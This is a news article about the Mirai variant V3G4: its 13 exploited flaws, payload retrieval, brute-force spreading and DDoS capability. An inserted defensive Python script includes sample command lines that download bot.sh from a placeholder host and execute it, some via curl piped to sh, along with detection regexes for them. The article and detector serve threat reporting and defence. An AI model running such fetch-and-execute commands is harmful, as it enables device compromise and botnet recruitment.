New Mirai Botnet Variant ‘V3G4’ Exploiting 13 Flaws to Target Linux and IoT Devices

February 17, 2023 | Rabbi Lakshmanan | IoT Security / Cyberattack


A new variant of the infamous Mirai botnet has been discovered using several security vulnerabilities to spread across Linux and IoT devices.

The new version, observed in late 2022, has been dubbed V3G4 by Palo Alto Networks Unit 42, which identified three different campaigns likely run by the same threat actor.

“Once a vulnerable device is compromised, it becomes part of a botnet that is fully controlled by the attacker,” said Unit 42 researchers. “Threat actors have the ability to leverage these devices to carry out further attacks, such as distributed denial of service (DDoS) attacks.”

The attacks primarily target exposed servers and network devices running Linux, with the attackers weaponizing 13 flaws that can lead to remote code execution (RCE).

Some of the notable flaws are critical ones in Atlassian Confluence Server and Data Center, DrayTek Vigor routers, Airspan AirSpot, and Geutebruck IP cameras. The oldest flaw in the list is CVE-2012-4869, an RCE bug in FreePBX.

After a successful compromise, the botnet payload is retrieved from a remote server using the wget and cURL utilities.
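One way a defender might hunt for the download step described above, as an added example that is not from the article or from Unit 42: it scores process-execution records for a wget/cURL fetch combined with staging in a world-writable directory, a chmod, a pipe to a shell, or a network-service parent. The record format, parent-process names, threshold and sample lines are constructed assumptions.

```python
import re

# Constructed process-execution records: (host, parent process, command line).
# Addresses use the 192.0.2.0/24 documentation range; none come from the article.
SAMPLE_EVENTS = [
    ("cam-01", "httpd", "sh -c cd /tmp; wget http://192.0.2.10/bot.sh; chmod 777 bot.sh; ./bot.sh"),
    ("pbx-02", "php-fpm", "sh -c curl -s http://192.0.2.10/bot.sh | sh"),
    ("build-03", "bash", "curl -fsSL https://example.org/release.tar.gz -o /home/ci/release.tar.gz"),
    ("web-04", "cron", "wget -q -O /var/backups/feed.xml https://example.org/feed.xml"),
    ("admin-05", "bash", "wget https://example.org/tool.tgz -O /tmp/tool.tgz"),
]

FETCH = re.compile(r"\b(wget|curl)\b[^;|&]*\bhttps?://\S+")
PIPE_TO_SHELL = re.compile(r"\b(wget|curl)\b[^;&]*\|\s*(ba|da|a)?sh\b")
# The leading character class keeps a URL path such as http://host/tmp/x from matching.
STAGING_DIR = re.compile(r"(^|[\s;&=>])(/tmp|/var/tmp|/dev/shm|/var/run)\b")
MAKE_EXEC = re.compile(r"\bchmod\s+(\S*\+x|[0-7]{3,4})\b")
# Assumed names of network-facing services that should rarely spawn a downloader.
SERVICE_PARENTS = {"httpd", "nginx", "php-fpm", "java", "lighttpd", "boa"}

def score(parent, cmdline):
    """Count download-and-execute signals in one record; 0 if nothing is fetched."""
    if not FETCH.search(cmdline):
        return 0, []
    checks = [
        ("piped-to-shell", PIPE_TO_SHELL.search(cmdline)),
        ("world-writable-staging-dir", STAGING_DIR.search(cmdline)),
        ("made-executable", MAKE_EXEC.search(cmdline)),
        ("spawned-by-network-service", parent in SERVICE_PARENTS),
    ]
    reasons = [name for name, matched in checks if matched]
    return len(reasons), reasons

def suspicious(events, threshold=2):
    """Return (host, score, reasons) for records at or above the threshold."""
    hits = []
    for host, parent, cmdline in events:
        points, reasons = score(parent, cmdline)
        if points >= threshold:
            hits.append((host, points, reasons))
    return hits

if __name__ == "__main__":
    for hit in suspicious(SAMPLE_EVENTS):
        print(hit)
```

A single signal, such as an administrator saving a download under /tmp, stays below the threshold, which keeps routine wget and cURL use out of the results.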


The botnet not only checks to see if it is already running on the infected machine, but also takes steps to terminate other competing botnets such as Mozi, Okami and Yakuza.

V3G4 also packs a set of default or weak login credentials that it uses to carry out brute-force attacks over Telnet/SSH and spread to other machines.

It also establishes connections with command-and-control servers and waits for commands to launch DDoS attacks against targets over UDP, TCP, and HTTP protocols.

“While the vulnerability described above has less attack complexity than previously observed variants, it still maintains a significant security impact that could lead to remote code execution,” the study said.

To stop such attacks, we recommend applying the necessary patches and updates as they become available and protecting your device with a strong password.
